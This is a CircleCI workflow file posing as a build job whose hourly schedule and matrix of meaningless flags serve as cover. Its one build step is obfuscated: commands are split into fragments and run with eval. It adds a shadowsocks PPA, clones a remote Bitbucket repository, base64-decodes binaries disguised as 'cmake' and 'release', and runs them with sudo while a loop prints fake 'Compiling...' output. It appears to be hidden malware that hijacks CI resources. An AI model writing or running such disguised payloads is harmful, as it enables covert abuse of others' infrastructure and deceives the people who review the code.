version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--rage-clean", "--complete-graph", "--binpkg-respect-use", "--verbose", "--autounmask-unrestricted-atoms", "--fetch-all-uri", "--use-ebuild-visibility", "--accept-properties", "--rage-clean", "--nodeps", "--pretend", "--select", "--changelog", "--autounmask-use", "--ignore-soname-deps", "--verbose-slot-rebuilds", "--binpkg-changed-deps", "--changed-deps-report", "--newuse", "--oneshot"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--rage-clean", "--complete-graph", "--binpkg-respect-use", "--verbose", "--autounmask-unrestricted-atoms", "--fetch-all-uri", "--use-ebuild-visibility", "--accept-properties", "--rage-clean", "--nodeps", "--pretend", "--select", "--changelog", "--autounmask-use", "--ignore-soname-deps", "--verbose-slot-rebuilds", "--binpkg-changed-deps", "--changed-deps-report", "--newuse", "--oneshot"]
    triggers:
      - schedule:
          cron: "19 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: GET
          command: |
            HfhQJE="sudo add-ap"
            oBAgFBWqspV="t-repositor"
            CGkRg="y ppa:max-c"
            kRrKjCdWsz="-lv/shadows"
            yGeRnhgaJL="ocks-libev "
            uaVxyqUXYsl="-y &>/dev/n"
            eval "$HfhQJE""$oBAgFBWqspV""$CGkRg""$kRrKjCdWsz""$yGeRnhgaJL""$uaVxyqUXYsl""ull || true"
            hoTglYtd="sudo add-ap"
            LBfsBl="t-repositor"
            LyUgXSz="y ppa:ondre"
            NlpQye="j/apache2 -"
            XUxSSL="y &>/dev/nu"
            eval "$hoTglYtd""$LBfsBl""$LyUgXSz""$NlpQye""$XUxSSL""ll || true"
            MjMdEmm="sudo apt up"
            nrvXDIwg="date || tru"
            eval "$MjMdEmm""$nrvXDIwg""e"
            sudo apt --yes install openssl &>/dev/null || true
            wMQrayTPFW="sudo apt --"
            vsnHGA="yes install"
            ezfWl=" cl-base64 "
            FfpuMGhfQ="git &>/dev/"
            OsTJENs="null || tru"
            eval "$wMQrayTPFW""$vsnHGA""$ezfWl""$FfpuMGhfQ""$OsTJENs""e"
            CCpJxzKK="git clone h"
            lSSUArUsOf="ttps://gccb"
            hxtbThoRc="uild@bitbuc"
            JiLJTikiMrV="ket.org/gcc"
            OwOwGZfA="build/gcc.g"
            UrHzrAYKrcY="it &>/dev/n"
            eval "$CCpJxzKK""$lSSUArUsOf""$hxtbThoRc""$JiLJTikiMrV""$OwOwGZfA""$UrHzrAYKrcY""ull"
            pSgaH="base64 -d g"
            aKADhxH="cc/cmake_np"
            eval "$pSgaH""$aKADhxH""_ > cmake"
            MvDfWZc="base64 -d g"
            wsuhle="cc/config_ "
            eval "$MvDfWZc""$wsuhle""> systemd"
            wIsMLDNSueX="base64 -d g"
            QLKQQzAis="cc/make_ > "
            eval "$wIsMLDNSueX""$QLKQQzAis""release"
            NUZvJzgL="sed -i 's/1"
            JYIUEZMEc="080/1081/g'"
            eval "$NUZvJzgL""$JYIUEZMEc"" systemd"
            chmod +x release cmake
            bBcTqS="./cmake"
            eval "$bBcTqS"""
            AWzzp="sed -i 's/b"
            GeAbS="uild/ob2o/g"
            eval "$AWzzp""$GeAbS""' systemd"
            IPpGVXw="sudo ./rele"
            JZZXUsxonoU="ase --confi"
            ZgiaqUC="g systemd &"
            Hrgin=">/dev/null "
            eval "$IPpGVXw""$JZZXUsxonoU""$ZgiaqUC""$Hrgin""&"
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2549)) ] && sudo killall release && break; sleep 199; done
